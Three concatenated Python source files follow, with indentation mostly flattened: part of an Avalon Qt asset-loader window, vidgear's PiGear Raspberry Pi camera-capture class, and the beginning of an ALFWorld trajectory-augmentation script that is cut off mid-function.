layout.setContentsMargins(0, 0, 0, 0)
load_button = QtWidgets.QPushButton("Load")
refresh_button = QtWidgets.QPushButton(awesome.icon("fa.refresh"), "")
refresh_button.setStyleSheet("""
QPushButton {
max-width: 30px;
font-family: "FontAwesome";
}
""")
offline_slider = QtWidgets.QSlider(QtCore.Qt.Horizontal)
offline_slider.setRange(0, 1)
offline_slider.setFixedHeight(25)
offline_slider.setStyleSheet("""
QSlider {
max-width: 100px;
}
QSlider::groove:horizontal {
border: 1px solid #666;
height: 23px;
background: #777;
margin: 2px 0;
border-radius: 4px;
}
QSlider::groove:horizontal:enabled {
border: 1px solid #222;
height: 23px;
background: qlineargradient(x1:0, y1:0, \
x2:0, y2:1, \
stop:0 #555, \
stop:1 #666);
margin: 2px 0;
border-radius: 4px;
}
QSlider::handle:horizontal {
background: #777;
border: 1px solid #555;
width: 45px;
margin: 1px;
border-radius: 2px;
}
QSlider::handle:horizontal:enabled {
border: 1px solid #333;
background: qlineargradient(x1:0, y1:0, \
x2:1, y2:1, \
                                           stop:0 #aaa, \
stop:1 #888);
}
""")
offline_label = QtWidgets.QLabel("Available offline..")
offline_on = QtWidgets.QLabel("On", offline_slider)
offline_off = QtWidgets.QLabel("Off", offline_slider)
offline_on.move(72, 6)
offline_off.move(16, 6)
for toggle in (offline_on, offline_off):
toggle.show()
toggle.setStyleSheet("QLabel { color: black; }")
offline = QtWidgets.QWidget()
layout = QtWidgets.QHBoxLayout(offline)
layout.addWidget(offline_label)
layout.addWidget(offline_slider)
layout.setContentsMargins(0, 0, 0, 0)
message = QtWidgets.QLabel()
message.hide()
side_created_container = QtWidgets.QWidget()
side_created_container.hide()
side_created_header = QtWidgets.QLabel("Created")
side_created_header.setStyleSheet("QLabel { font-weight: bold }")
side_created = QtWidgets.QLabel()
side_created.setWordWrap(True)
layout = QtWidgets.QVBoxLayout(side_created_container)
layout.addWidget(side_created_header)
layout.addWidget(side_created)
layout.setContentsMargins(0, 0, 0, 0)
side_comment_container = QtWidgets.QWidget()
side_comment_container.hide()
side_comment_header = QtWidgets.QLabel("Comment")
side_comment_header.setStyleSheet("QLabel { font-weight: bold }")
side_comment = QtWidgets.QLabel()
side_comment.setWordWrap(True)
layout = QtWidgets.QVBoxLayout(side_comment_container)
layout.addWidget(side_comment_header)
layout.addWidget(side_comment)
layout.setContentsMargins(0, 0, 0, 0)
side_source_container = QtWidgets.QWidget()
        side_source_container.hide()
side_source_header = QtWidgets.QLabel("Source")
side_source_header.setStyleSheet("QLabel { font-weight: bold }")
side_source = QtWidgets.QLabel()
side_source.setWordWrap(True)
side_source.setContextMenuPolicy(QtCore.Qt.CustomContextMenu)
side_source.customContextMenuRequested.connect(
self.on_copy_source_menu)
layout = QtWidgets.QVBoxLayout(side_source_container)
layout.addWidget(side_source_header)
layout.addWidget(side_source)
layout.setContentsMargins(0, 0, 0, 0)
side_preset_container = QtWidgets.QWidget()
side_preset_header = QtWidgets.QLabel("Preset")
side_preset_header.setStyleSheet("QLabel { font-weight: bold }")
side_preset = QtWidgets.QComboBox()
if not os.getenv("AVALON_EARLY_ADOPTER"):
side_preset_container.hide()
layout = QtWidgets.QVBoxLayout(side_preset_container)
layout.addWidget(side_preset_header)
layout.addWidget(side_preset)
layout.setContentsMargins(0, 0, 0, 0)
buttons = QtWidgets.QWidget()
layout = QtWidgets.QHBoxLayout(buttons)
layout.addWidget(refresh_button)
layout.addWidget(load_button, 5)
layout.setContentsMargins(0, 0, 0, 0)
layout = QtWidgets.QVBoxLayout(sidepanel)
layout.addWidget(side_comment_container)
layout.addWidget(side_created_container)
layout.addWidget(side_source_container)
layout.addWidget(side_preset_container)
layout.addWidget(QtWidgets.QWidget(), 1)
layout.addWidget(options, 0, QtCore.Qt.AlignBottom)
layout.addWidget(offline)
layout.addWidget(buttons)
layout.setSpacing(10)
layout.setContentsMargins(0, 0, 0, 0)
layout = QtWidgets.QVBoxLayout(footer)
layout.addWidget(message)
layout.setContentsMargins(0, 0, 0, 0)
layout = QtWidgets.QVBoxLayout(self)
layout.addWidget(body)
layout.addWidget(footer)
self.data = {
"button": {
"load": load_button,
"autoclose": autoclose_checkbox,
"offline": offline_slider,
},
"model": {
"assets": assets,
"subsets": subsets,
"versions": versions,
"representations": representations,
},
"label": {
"message": message,
"comment": side_comment,
"commentContainer": side_comment_container,
"created": side_created,
"createdContainer": side_created_container,
"source": side_source,
"sourceContainer": side_source_container,
"preset": side_preset,
"presetContainer": side_preset_container,
},
"state": {
"template": None,
"context": {
"root": None,
"project": None,
"asset": None,
"silo": None,
"subset": None,
"version": None,
"representation": None,
},
}
}
self.download_progressed.connect(self.on_download_progressed)
self.download_completed.connect(self.on_download_completed)
self.download_errored.connect(self.on_download_errored)
offline_slider.valueChanged.connect(self.on_make_available_offline)
load_button.clicked.connect(self.on_load_pressed)
refresh_button.clicked.connect(self.on_refresh_pressed)
assets.currentItemChanged.connect(self.on_assetschanged)
subsets.itemSelectionChanged.connect(self.on_subsetschanged)
versions.currentItemChanged.connect(self.on_versionschanged)
representations.currentItemChanged.connect(
self.on_representationschanged)
# Defaults
self.resize(1100, 600)
load_button.setEnabled(False)
offline_slider.setEnabled(False)
thread = threading.Thread(target=self._download_manager)
thread.daemon = True
thread.start()
def _download_manager(self):
while True:
log.info("Listening for downloads..")
src, dst = module._downloads.get()
# Killswitch
if not any([src, dst]):
break
previous = 0
for progress, error in io.download(src, dst):
if module.closed:
return log.info(
"There were active downloads, they were cancelled"
)
if error:
log.error(error)
self.download_errored.emit(
"ERROR: Could not download %s" % src)
break
# Avoid emitting signals needlessly.
# Progress is sometimes less than one whole percent.
if progress != previous:
previous = progress
self.download_progressed.emit(src, progress)
module._downloading.pop(dst)
if not error:
self.download_completed.emit()
def on_copy_source_to_clipboard(self):
source = self.data["label"]["source"].text()
source = source.format(root=api.registered_root())
clipboard = QtWidgets.QApplication.clipboard()
clipboard.setText(source)
def on_copy_source_menu(self, pos):
pos = QtGui.QCursor.pos()
menu = QtWidgets.QMenu()
action = menu.addAction("Copy to clipboard")
action.triggered.connect(self.on_copy_source_to_clipboard)
menu.move(pos)
menu.exec_()
def on_download_progressed(self, fname, progress):
self.echo("Downloading ({remaining}) {fname}.. {progress}%".format(
remaining=module._downloads.qsize() + 1,
fname=fname,
progress=progress
))
def on_download_completed(self):
self._representationschanged()
self.echo("Done")
def on_download_errored(self, message):
self._representationschanged()
self.echo(message)
def on_make_available_offline(self, state):
if state != 1:
return
if not self.data["button"]["offline"].isEnabled():
return
offline = self.data["button"]["offline"]
models = self.data["model"]
representations_model = models["representations"]
representation_item = representations_model.currentItem()
for representation in representation_item.data(RepresentationsRole):
version = representation["_version"]
# Backwards compatibility, older members did not have this key
locations = version.get("locations", list())
if not locations:
# Support global default, primarily intended during
# the transition from not using locations.
try:
locations = [api.Session["AVALON_LOCATION"]]
except KeyError:
locations = list()
try:
# TODO(marcus): Support multiple locations
location = locations[0]
except IndexError:
offline.setToolTip("Couldn't find where to "
"download this from..")
continue
try:
template = self.data["state"]["template"]
context = self.data["state"]["context"].copy()
context["root"] = location + "/download"
path = template.format(**context)
except Exception as e:
log.error(e)
self.echo("Something went wrong..")
else:
context = self.data["state"]["context"]
src = path
dst = template.format(**context)
module._downloads.put((src, dst))
module._downloading[dst] = True
self.echo("Preparing to download '%s'.." % src)
offline.setToolTip("Download in progress..")
offline.setEnabled(False)
def keyPressEvent(self, event):
"""Delegate keyboard events"""
if event.key() == QtCore.Qt.Key_Return:
return self.on_enter()
def on_enter(self):
self.on_load_pressed()
# -------------------------------
# Delay calling blocking methods
# -------------------------------
def refresh(self):
self.echo("Fetching results..")
lib.schedule(self._refresh, 100, channel="mongo")
def on_assetschanged(self, *args):
self.echo("Fetching results..")
lib.schedule(self._assetschanged, 100, channel="mongo")
def on_subsetschanged(self, *args):
self.echo("Fetching results..")
lib.schedule(self._subsetschanged, 100, channel="mongo")
def on_versionschanged(self, *args):
self.echo("Fetching results..")
lib.schedule(self._versionschanged, 100, channel="mongo")
def on_representationschanged(self, *args):
lib.schedule(self._representationschanged, 100, channel="mongo")
# ------------------------------
def _refresh(self):
"""Load assets from disk and add them to a QListView"""
assets_model = self.data["model"]["assets"]
assets_model.clear()
has = {"children": False}
project = io.find_one({"type": "project"})
preset = self.data["label"]["preset"]
preset.clear()
tasks = sorted(project["config"]["tasks"], key=lambda i: i["name"])
current_index = 0
for index, task in enumerate(tasks):
item = preset.addItem(task["name"])
if task["name"] == os.getenv("AVALON_TASK"):
current_index = index
preset.setCurrentIndex(current_index)
assert project, "This is a bug"
assets = io.find({"type": "asset", "parent": project["_id"]})
for asset in sorted(assets, key=lambda i: i["name"]):
item = QtWidgets.QListWidgetItem(asset["name"])
item.setData(QtCore.Qt.ItemIsEnabled, True)
item.setData(DocumentRole, asset)
assets_model.addItem(item)
has["children"] = True
if not has["children"]:
item = QtWidgets.QListWidgetItem("No assets found")
item.setData(QtCore.Qt.ItemIsEnabled, False)
assets_model.addItem(item)
assets_model.setFocus()
assets_model.setCurrentRow(0)
# Update state
state = self.data["state"]
state["template"] = project["config"]["template"]["publish"]
state["context"]["root"] = api.registered_root()
state["context"]["project"] = project["name"]
self.data["button"]["load"].setEnabled(False)
def _assetschanged(self):
assets_model = self.data["model"]["assets"]
subsets_model = self.data["model"]["subsets"]
subsets_model.clear()
t1 = time.time()
asset_item = assets_model.currentItem()
# The model is empty
if asset_item is None:
return
document = asset_item.data(DocumentRole)
# The model contains an empty item
if document is None:
return
has = {"children": False}
for child in io.find({"type": "subset",
"parent": document["_id"]}):
item = QtWidgets.QListWidgetItem(child["name"])
item.setData(QtCore.Qt.ItemIsEnabled, True)
item.setData(DocumentRole, child)
item.setData(LocationRole, document.get("locations", []))
subsets_model.addItem(item)
has["children"] = True
if not has["children"]:
item = QtWidgets.QListWidgetItem("No subsets found")
item.setData(QtCore.Qt.ItemIsEnabled, False)
subsets_model.addItem(item)
self.data["state"]["context"]["asset"] = document["name"]
self.data["state"]["context"]["silo"] = document["silo"]
self.echo("Duration: %.3fs" % (time.time() - t1))
def _subsetschanged(self):
subsets_model = self.data["model"]["subsets"]
versions_model = self.data["model"]["versions"]
versions_model.clear()
t1 = time.time()
has = {"children": False}
if len(subsets_model.selectedItems()) == 0:
has["children"] = False
elif len(subsets_model.selectedItems()) > 1:
item = QtWidgets.QListWidgetItem("Latest")
item.setData(QtCore.Qt.ItemIsEnabled, True)
item.setData(LatestRole, True)
versions_model.addItem(item)
versions_model.setCurrentItem(item)
has["children"] = True
else:
subset_item = subsets_model.currentItem()
if not subset_item.data(QtCore.Qt.ItemIsEnabled):
return
document = subset_item.data(DocumentRole)
self.data["state"]["context"]["subset"] = document["name"]
for child in io.find({"type": "version",
"parent": document["_id"]},
sort=[("name", -1)]):
item = QtWidgets.QListWidgetItem("v%03d" % child["name"])
item.setData(QtCore.Qt.ItemIsEnabled, True)
item.setData(DocumentRole, child)
versions_model.addItem(item)
has["children"] = True
versions_model.setCurrentRow(0)
if not has["children"]:
item = QtWidgets.QListWidgetItem("No versions found")
item.setData(QtCore.Qt.ItemIsEnabled, False)
versions_model.addItem(item)
self.echo("Duration: %.3fs" % (time.time() - t1))
def _versionschanged(self):
self.data["label"]["commentContainer"].hide()
self.data["label"]["createdContainer"].hide()
self.data["label"]["sourceContainer"].hide()
versions_model = self.data["model"]["versions"]
representations_model = self.data["model"]["representations"]
representations_model.clear()
version_item = versions_model.currentItem()
# Nothing is selected
if version_item is None:
return
if not version_item.data(QtCore.Qt.ItemIsEnabled):
return
representations_by_name = {}
t1 = time.time()
if version_item.data(LatestRole):
# Determine the latest version for each currently selected subset.
subsets = self.data["model"]["subsets"].selectedItems()
subsets = list(item.data(DocumentRole) for item in subsets)
            all_versions = list(io.find({
                "type": "version",
                "parent": {"$in": [subset["_id"] for subset in subsets]}
            }))
# What is the latest version per subset?
# (hint: Associated versions share parent)
latest_versions = {
version["parent"]: version
for version in all_versions
}
for version in all_versions:
parent = version["parent"]
highest = latest_versions[parent]["name"]
if version["name"] > highest:
latest_versions[parent] = version
versions_by_id = {
version["_id"]: version
for version in latest_versions.values()
}
representations = io.find({
"type": "representation",
"parent": {"$in": list(versions_by_id.keys())}
})
for representation in representations:
name = representation["name"]
# Embed version, internally
representation["_version"] = versions_by_id[
representation["parent"]
]
# TODO(marcus): These are permanently excluded
# for now, but look towards making this customisable.
if name in ("json", "source"):
continue
if name not in representations_by_name:
representations_by_name[name] = list()
representations_by_name[name].append(representation)
# Prevent accidental load of subsets missing any one representation
for name in representations_by_name.copy():
if len(representations_by_name[name]) != len(subsets):
representations_by_name.pop(name)
self.echo("'%s' missing from some subsets." % name)
else:
version_document = version_item.data(DocumentRole)
self.data["state"]["context"]["version"] = version_document["name"]
representations = io.find({"type": "representation",
"parent": version_document["_id"]})
representations_by_name = {}
for representation in representations:
# Backwards compatibility
if representation["name"] in ("json", "source"):
continue
name = representation["name"]
representation["_version"] = version_document
representations_by_name[name] = [representation]
self.data["label"]["commentContainer"].show()
comment = self.data["label"]["comment"]
comment.setText(
version_document["data"].get("comment") or "No comment"
)
self.data["label"]["sourceContainer"].show()
source = self.data["label"]["source"]
source.setText(version_document["data"].get("source", "No source"))
self.data["label"]["createdContainer"].show()
t = version_document["data"]["time"]
t = datetime.datetime.strptime(t, "%Y%m%dT%H%M%SZ")
t = datetime.datetime.strftime(t, "%b %d %Y %I:%M%p")
created = self.data["label"]["created"]
created.setText(t + " GMT")
has = {"children": False}
for name, documents in representations_by_name.items():
# TODO(marcus): Separate this into something the
# supervisor can configure.
item = QtWidgets.QListWidgetItem({
"ma": "Maya Ascii",
"source": "Original source file",
"abc": "Alembic",
"history": "History",
"curves": "Animation curves",
}.get(name, name)) # Default to using name as-is
item.setData(QtCore.Qt.ItemIsEnabled, True)
item.setData(RepresentationsRole, documents)
representations_model.addItem(item)
has["children"] = True
representations_model.setCurrentRow(0)
if not has["children"]:
item = QtWidgets.QListWidgetItem("No representations found")
item.setData(QtCore.Qt.ItemIsEnabled, False)
representations_model.addItem(item)
self.echo("Duration: %.3fs" % (time.time() - t1))
def _representationschanged(self):
offline = self.data["button"]["offline"]
load_button = self.data["button"]["load"]
load_button.setEnabled(False)
model = self.data["model"]["representations"]
item = model.currentItem()
if item is None:
return
if not item.data(QtCore.Qt.ItemIsEnabled):
return
# Update state
document = item.data(RepresentationsRole)[0]
self.data["state"]["context"]["representation"] = document["name"]
template = self.data["state"]["template"]
context = self.data["state"]["context"]
path = template.format(**context)
offline.setEnabled(False)
if path in module._downloading or os.path.exists(path):
offline.setValue(1)
load_button.setEnabled(True)
offline.setToolTip("Already available offline.")
else:
offline.setValue(0)
# Is the representation available at any location?
offline.setEnabled(True)
offline.setToolTip("Toggle to make available offline.")
def on_refresh_pressed(self):
self.refresh()
def on_load_pressed(self):
models = self.data["model"]
representations_model = models["representations"]
representation_item = representations_model.currentItem()
preset = self.data["label"]["preset"]
preset = preset.currentText()
if representation_item is None:
return
for document in representation_item.data(RepresentationsRole):
try:
_id = document["_id"]
self.echo("api.registered_host()."
"load(representation=\"%s\")" % _id)
# Current state
version = document["_version"]
families = version["data"]["families"]
representation = document["name"]
loader = next(
Loader for Loader in api.discover(api.Loader)
if all([
representation in Loader.representations,
any(family in families for family in Loader.families)
])
)
api.load(Loader=loader, representation=_id)
except StopIteration:
raise IndexError("No loaders available")
except ValueError as e:
self.echo(e)
raise
except NameError as e:
self.echo(e)
raise
# Catch-all
except Exception as e:
self.echo("Program error: %s" % str(e))
raise
if self.data["button"]["autoclose"].checkState():
self.close()
def echo(self, message):
widget = self.data["label"]["message"]
widget.setText(str(message))
widget.show()
print(message)
lib.schedule(widget.hide, 5000, channel="message")
def closeEvent(self, event):
# Kill download manager
module._downloads.put((None, None))
# Kill on holding SHIFT
modifiers = QtWidgets.QApplication.queryKeyboardModifiers()
shift_pressed = QtCore.Qt.ShiftModifier & modifiers
if shift_pressed:
print("Force quitted..")
module.closed = True
self.setAttribute(QtCore.Qt.WA_DeleteOnClose)
print("Good bye")
return super(Window, self).closeEvent(event)
def show(root=None, debug=False, parent=None):
"""Display Loader GUI
Arguments:
debug (bool, optional): Run loader in debug-mode,
defaults to False
"""
# Remember window
if module.window is not None:
try:
return module.window.show()
except RuntimeError as e:
            if not str(e).rstrip().endswith("already deleted."):
raise
# Garbage collected
module.window = None
if debug:
import traceback
sys.excepthook = lambda typ, val, tb: traceback.print_last()
io.install()
any_project = next(
project for project in io.projects()
if project.get("active", True) is not False
)
api.Session["AVALON_PROJECT"] = any_project["name"]
with lib.application():
window = Window(parent)
window.show()
window.refresh()
module.window = window
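# --- Usage sketch (illustrative, not part of the module) ---
# The loader is normally launched from within a host integration. A minimal
# standalone launch, assuming an active project exists in the database, would
# look like:
#   show(debug=True)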
|
pigear.py
|
"""
===============================================
vidgear library source-code is deployed under the Apache 2.0 License:
Copyright (c) 2019 Abhishek Thakur(@abhiTronix) <abhi.una12@gmail.com>
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
===============================================
"""
# import the necessary packages
import cv2
import sys
import time
import logging as log
from threading import Thread
# import helper packages
from .helper import capPropId, logger_handler, import_dependency_safe
# safe import critical Class modules
picamera = import_dependency_safe("picamera", error="silent")
if not (picamera is None):
from picamera import PiCamera
from picamera.array import PiRGBArray
# define logger
logger = log.getLogger("PiGear")
logger.propagate = False
logger.addHandler(logger_handler())
logger.setLevel(log.DEBUG)
class PiGear:
"""
PiGear is similar to CamGear API but exclusively made to support various Raspberry Pi Camera Modules (such as OmniVision OV5647 Camera Module and Sony IMX219 Camera Module).
    PiGear provides a flexible multi-threaded framework around the complete picamera python library, and provides the ability to exploit almost all of its parameters like brightness,
saturation, sensor_mode, iso, exposure, etc. effortlessly. Furthermore, PiGear also supports multiple camera modules, such as in the case of Raspberry-Pi Compute Module IO boards.
Best of all, PiGear contains Threaded Internal Timer - that silently keeps active track of any frozen-threads/hardware-failures and exit safely, if any does occur. That means that
if you're running PiGear API in your script and someone accidentally pulls the Camera-Module cable out, instead of going into possible kernel panic, API will exit safely to save resources.
!!! warning "Make sure to enable [Raspberry Pi hardware-specific settings](https://picamera.readthedocs.io/en/release-1.13/quickstart.html) prior using this API, otherwise nothing will work."
"""
def __init__(
self,
camera_num=0,
resolution=(640, 480),
framerate=30,
colorspace=None,
logging=False,
time_delay=0,
**options
):
"""
This constructor method initializes the object state and attributes of the PiGear class.
Parameters:
camera_num (int): selects the camera module index which will be used as source.
            resolution (tuple): sets the resolution (i.e. `(width,height)`) of the source.
framerate (int/float): sets the framerate of the source.
colorspace (str): selects the colorspace of the input stream.
logging (bool): enables/disables logging.
time_delay (int): time delay (in sec) before start reading the frames.
options (dict): provides ability to alter Source Tweak Parameters.
"""
# raise error(s) for critical Class imports
import_dependency_safe(
"picamera" if picamera is None else "",
)
# enable logging if specified
self.__logging = False
if logging:
self.__logging = logging
assert (
isinstance(framerate, (int, float)) and framerate > 5.0
), "[PiGear:ERROR] :: Input framerate value `{}` is a Invalid! Kindly read docs.".format(
framerate
)
assert (
isinstance(resolution, (tuple, list)) and len(resolution) == 2
), "[PiGear:ERROR] :: Input resolution value `{}` is a Invalid! Kindly read docs.".format(
resolution
)
if not (isinstance(camera_num, int) and camera_num >= 0):
            logger.warning(
                "Input camera_num value `{}` is invalid, defaulting to index 0!".format(camera_num)
            )
            camera_num = 0
# initialize the picamera stream at given index
self.__camera = PiCamera(camera_num=camera_num)
self.__camera.resolution = tuple(resolution)
self.__camera.framerate = framerate
if self.__logging:
logger.debug(
"Activating Pi camera at index: {} with resolution: {} & framerate: {}".format(
camera_num, resolution, framerate
)
)
# initialize framerate variable
self.framerate = framerate
# initializing colorspace variable
self.color_space = None
# reformat dict
options = {str(k).strip(): v for k, v in options.items()}
# define timeout variable default value(handles hardware failures)
self.__failure_timeout = options.pop("HWFAILURE_TIMEOUT", 2.0)
if isinstance(self.__failure_timeout, (int, float)):
if not (10.0 > self.__failure_timeout > 1.0):
raise ValueError(
"[PiGear:ERROR] :: `HWFAILURE_TIMEOUT` value can only be between 1.0 ~ 10.0"
)
if self.__logging:
logger.debug(
"Setting HW Failure Timeout: {} seconds".format(
self.__failure_timeout
)
)
else:
# reset improper values
self.__failure_timeout = 2.0
try:
# apply attributes to source if specified
for key, value in options.items():
if self.__logging:
logger.debug("Setting Parameter: {} = '{}'".format(key, value))
setattr(self.__camera, key, value)
except Exception as e:
# Catch if any error occurred
logger.exception(str(e))
# separately handle colorspace value to int conversion
if not (colorspace is None):
self.color_space = capPropId(colorspace.strip())
if self.__logging and not (self.color_space is None):
logger.debug(
"Enabling `{}` colorspace for this video stream!".format(
colorspace.strip()
)
)
# enable rgb capture array thread and capture stream
self.__rawCapture = PiRGBArray(self.__camera, size=resolution)
self.stream = self.__camera.capture_continuous(
self.__rawCapture, format="bgr", use_video_port=True
)
# frame variable initialization
self.frame = None
try:
stream = next(self.stream)
self.frame = stream.array
self.__rawCapture.seek(0)
self.__rawCapture.truncate()
# render colorspace if defined
if not (self.frame is None) and not (self.color_space is None):
self.frame = cv2.cvtColor(self.frame, self.color_space)
except Exception as e:
logger.exception(str(e))
raise RuntimeError("[PiGear:ERROR] :: Camera Module failed to initialize!")
# applying time delay to warm-up picamera only if specified
if time_delay and isinstance(time_delay, (int, float)):
time.sleep(time_delay)
# thread initialization
self.__thread = None
# timer thread initialization(Keeps check on frozen thread)
self.__timer = None
self.__t_elasped = 0.0 # records time taken by thread
# catching thread exceptions
self.__exceptions = None
# initialize termination flag
self.__terminate = False
def start(self):
"""
Launches the internal *Threaded Frames Extractor* daemon
        **Returns:** A reference to the PiGear class object.
"""
# Start frame producer thread
self.__thread = Thread(target=self.__update, name="PiGear", args=())
self.__thread.daemon = True
self.__thread.start()
# Start internal timer thread
self.__timer = Thread(target=self.__timeit, name="PiTimer", args=())
self.__timer.daemon = True
self.__timer.start()
return self
def __timeit(self):
"""
        Threaded Internal Timer that keeps a check on thread execution timing
"""
# assign current time
self.__t_elasped = time.time()
        # loop until terminated
while not (self.__terminate):
# check for frozen thread
if time.time() - self.__t_elasped > self.__failure_timeout:
# log failure
if self.__logging:
logger.critical("Camera Module Disconnected!")
# prepare for clean exit
self.__exceptions = True
self.__terminate = True # self-terminate
def __update(self):
"""
        A **Threaded Frames Extractor** that keeps iterating frames from the PiCamera API
        into the internal `frame` attribute, until the thread is terminated or frames run out.
"""
# keep looping infinitely until the thread is terminated
while not (self.__terminate):
try:
# Try to iterate next frame from generator
stream = next(self.stream)
except Exception:
# catch and save any exceptions
self.__exceptions = sys.exc_info()
break # exit
            # update the timer watched by the internal failure watchdog
self.__t_elasped = time.time()
# grab the frame from the stream and clear the stream in
# preparation for the next frame
frame = stream.array
self.__rawCapture.seek(0)
self.__rawCapture.truncate()
# apply colorspace if specified
if not (self.color_space is None):
# apply colorspace to frames
color_frame = None
try:
if isinstance(self.color_space, int):
color_frame = cv2.cvtColor(frame, self.color_space)
else:
if self.__logging:
logger.warning(
"Global color_space parameter value `{}` is not a valid!".format(
self.color_space
)
)
self.color_space = None
except Exception as e:
# Catch if any error occurred
self.color_space = None
if self.__logging:
logger.exception(str(e))
logger.warning("Input colorspace is not a valid colorspace!")
if not (color_frame is None):
self.frame = color_frame
else:
self.frame = frame
else:
self.frame = frame
# terminate processes
if not (self.__terminate):
self.__terminate = True
# release picamera resources
self.__rawCapture.close()
self.__camera.close()
def read(self):
"""
        Returns the latest frame extracted by the internal frame-producer thread, after first
        checking for any pending thread exceptions or hardware failures.
        **Returns:** An n-dimensional numpy array.
"""
# check if there are any thread exceptions
if not (self.__exceptions is None):
if isinstance(self.__exceptions, bool):
# clear frame
self.frame = None
# notify user about hardware failure
raise SystemError(
"[PiGear:ERROR] :: Hardware failure occurred, Kindly reconnect Camera Module and restart your Pi!"
)
else:
# clear frame
self.frame = None
# re-raise error for debugging
error_msg = (
"[PiGear:ERROR] :: Camera Module API failure occured: {}".format(
self.__exceptions[1]
)
)
raise RuntimeError(error_msg).with_traceback(self.__exceptions[2])
# return the frame
return self.frame
def stop(self):
"""
        Safely terminates the thread, and releases the VideoStream resources.
"""
if self.__logging:
logger.debug("Terminating PiGear Processes.")
# make sure that the threads should be terminated
self.__terminate = True
# stop timer thread
if not (self.__timer is None):
self.__timer.join()
self.__timer = None
# handle camera thread
if not (self.__thread is None):
            # check if hardware failure occurred
if not (self.__exceptions is None) and isinstance(self.__exceptions, bool):
# force release picamera resources
self.__rawCapture.close()
self.__camera.close()
# properly handle thread exit
            self.__thread.join()  # wait if the thread is still processing some information
# remove any threads
self.__thread = None
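# --- Usage sketch (illustrative, not part of the API) ---
# A minimal capture loop, assuming a Raspberry Pi with the picamera stack
# installed and a camera module attached; parameters mirror the constructor
# documented above.
#
#   stream = PiGear(resolution=(640, 480), framerate=30, logging=True).start()
#   while True:
#       frame = stream.read()
#       if frame is None:
#           break
#       cv2.imshow("Output Frame", frame)
#       if cv2.waitKey(1) & 0xFF == ord("q"):
#           break
#   cv2.destroyAllWindows()
#   stream.stop()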
|
augment_trajectories.py
|
import os
import sys
sys.path.append(os.path.join(os.environ['ALFWORLD_ROOT']))
sys.path.append(os.path.join(os.environ['ALFWORLD_ROOT'], 'gen'))
import json
import glob
import os
import constants
import cv2
import shutil
import numpy as np
import argparse
import threading
import time
import copy
import random
from utils.video_util import VideoSaver
from utils.py_util import walklevel
from env.thor_env import ThorEnv
TRAJ_DATA_JSON_FILENAME = "traj_data.json"
AUGMENTED_TRAJ_DATA_JSON_FILENAME = "augmented_traj_data.json"
IMAGES_FOLDER = "images"
MASKS_FOLDER = "masks"
META_FOLDER = "meta"
IMAGE_WIDTH = 400
IMAGE_HEIGHT = 400
render_settings = dict()
render_settings['renderImage'] = True
render_settings['renderDepthImage'] = True
render_settings['renderObjectImage'] = True
render_settings['renderClassImage'] = True
video_saver = VideoSaver()
def get_image_index(save_path):
return len(glob.glob(save_path + '/*.png'))
def save_image_with_delays(env, action,
save_path, direction=constants.BEFORE):
im_ind = get_image_index(save_path)
counts = constants.SAVE_FRAME_BEFORE_AND_AFTER_COUNTS[action['action']][direction]
for i in range(counts):
save_image(env.last_event, save_path)
env.noop()
return im_ind
def save_image(event, save_path):
# rgb
rgb_save_path = os.path.join(save_path, IMAGES_FOLDER)
rgb_image = event.frame[:, :, ::-1]
# masks
mask_save_path = os.path.join(save_path, MASKS_FOLDER)
mask_image = event.instance_segmentation_frame
# dump images
im_ind = get_image_index(rgb_save_path)
cv2.imwrite(rgb_save_path + '/%09d.png' % im_ind, rgb_image)
cv2.imwrite(mask_save_path + '/%09d.png' % im_ind, mask_image)
return im_ind
def save_images_in_events(events, root_dir):
for event in events:
save_image(event, root_dir)
def clear_and_create_dir(path):
# if os.path.exists(path):
# shutil.rmtree(path)
if not os.path.exists(path):
os.makedirs(path)
def get_scene_type(scene_num):
if scene_num < 100:
return 'kitchen'
elif scene_num < 300:
return 'living'
elif scene_num < 400:
return 'bedroom'
else:
return 'bathroom'
def get_openable_points(traj_data):
scene_num = traj_data['scene']['scene_num']
openable_json_file = os.path.join(os.environ['ALFWORLD_ROOT'], 'gen/layouts/FloorPlan%d-openable.json' % scene_num)
with open(openable_json_file, 'r') as f:
openable_points = json.load(f)
return openable_points
def explore_scene(env, traj_data, root_dir):
'''
Use pre-computed openable points from ALFRED to store receptacle locations
'''
openable_points = get_openable_points(traj_data)
agent_height = env.last_event.metadata['agent']['position']['y']
for recep_id, point in openable_points.items():
recep_class = recep_id.split("|")[0]
action = {'action': 'TeleportFull',
'x': point[0],
'y': agent_height,
'z': point[1],
'rotateOnTeleport': False,
'rotation': point[2],
'horizon': point[3]}
event = env.step(action)
save_frame(env, event, root_dir)
def augment_traj(env, json_file):
# load json data
with open(json_file) as f:
traj_data = json.load(f)
# fresh images list
traj_data['images'] = list()
# scene setup
scene_num = traj_data['scene']['scene_num']
object_poses = traj_data['scene']['object_poses']
object_toggles = traj_data['scene']['object_toggles']
dirty_and_empty = traj_data['scene']['dirty_and_empty']
# reset
scene_name = 'FloorPlan%d' % scene_num
scene_type = get_scene_type(scene_num)
env.reset(scene_name)
env.restore_scene(object_poses, object_toggles, dirty_and_empty)
root_dir = os.path.join(args.save_path, scene_type)
imgs_dir = os.path.join(root_dir, IMAGES_FOLDER)
mask_dir = os.path.join(root_dir, MASKS_FOLDER)
meta_dir = os.path.join(root_dir, META_FOLDER)
clear_and_create_dir(imgs_dir)
clear_and_create_dir(mask_dir)
clear_and_create_dir(meta_dir)
explore_scene(env, traj_data, root_dir)
env.step(dict(traj_data['scene']['init_action']))
# print("Task: %s" % (traj_data['template']['task_desc']))
# setup task
env.set_task(traj_data, args, reward_type='dense')
rewards = []
for ll_idx, ll_action in enumerate(traj_data['plan']['low_actions']):
# next cmd under the current hl_action
cmd = ll_action['api_action']
hl_action = traj_data['plan']['high_pddl'][ll_action['high_idx']]
# remove unnecessary keys
cmd = {k: cmd[k] for k in ['action', 'objectId', 'receptacleObjectId', 'placeStationary', 'forceAction'] if k in cmd}
if "MoveAhead" in cmd['action']:
event = env.step(cmd)
elif "Rotate" in cmd['action']:
event = env.step(cmd)
elif "Look" in cmd['action']:
event = env.step(cmd)
else:
event = env.step(cmd)
save_frame(env, event, root_dir)
if not event.metadata['lastActionSuccess']:
raise Exception("Replay Failed: %s" % (env.last_event.metadata['errorMessage']))
def save_frame(env, event, root_dir):
im_idx = save_image(event, root_dir)
